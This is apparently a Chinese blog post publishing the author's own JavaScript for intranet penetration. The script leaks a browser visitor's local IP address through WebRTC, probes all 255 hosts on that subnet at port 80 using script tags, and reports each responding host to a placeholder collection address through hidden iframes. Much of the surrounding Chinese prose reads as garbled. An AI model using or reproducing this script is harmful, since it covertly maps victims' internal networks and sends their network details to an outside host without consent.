var ip_arr = [];
var TagName = document.getElementsByTagName("body")[0];
function form_ip(ip,port){  //运用iframe的src属性来发送ip、port数据内容
    var iframe = document.createElement("iframe");
    iframe.setAttribute("src","接收的地点?接收内网ip的参数=" + ip + "&接收内网开放端口的参数=" + port);
    iframe.setAttribute("style","display:none")
    TagName.appendChild(iframe);
}
function getIPs(callback){
    var ip_dups = {};
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
    var servers = undefined;
    if(window.webkitRTCPeerConnection)
    //假如想猎取实在的外网IP，请把下一行改成servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
        servers = {iceServers: []};
    var pc = new RTCPeerConnection(servers, mediaConstraints);
    pc.onicecandidate = function(ice){
        if(ice.candidate){
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
            ip_dups[ip_addr] = true;
        }
    };
    pc.createDataChannel("");
    pc.createOffer(function(result){
        pc.setLocalDescription(result, function(){});

    }, function(){});
}
getIPs(function(ip){  //遍历内网ip及80端口，这里只写了80端口，多个端口，速率将会的异常慢。
    ip = ip.split(".");
    ip.pop();
    ip = ip.join(".");
    for(var i = 1;i<=255;i++){
        var script = document.createElement("script");
        var ip_url = ip + "." + i + ":80";
        script.setAttribute("src","http://" + ip_url);
        script.setAttribute("onload","form_ip('" + ip + "." + i + "','80')");
        TagName.appendChild(script);
    }
});

虽然WebRTC已不是什么新技术了，用JavaScript举行内网渗入，网上也有申明，然则都没怎样放出代码。这里就就放出我本身的写的。getIPs(function(ip){...} 效力不怎样高，若有更高者能够在下面给出。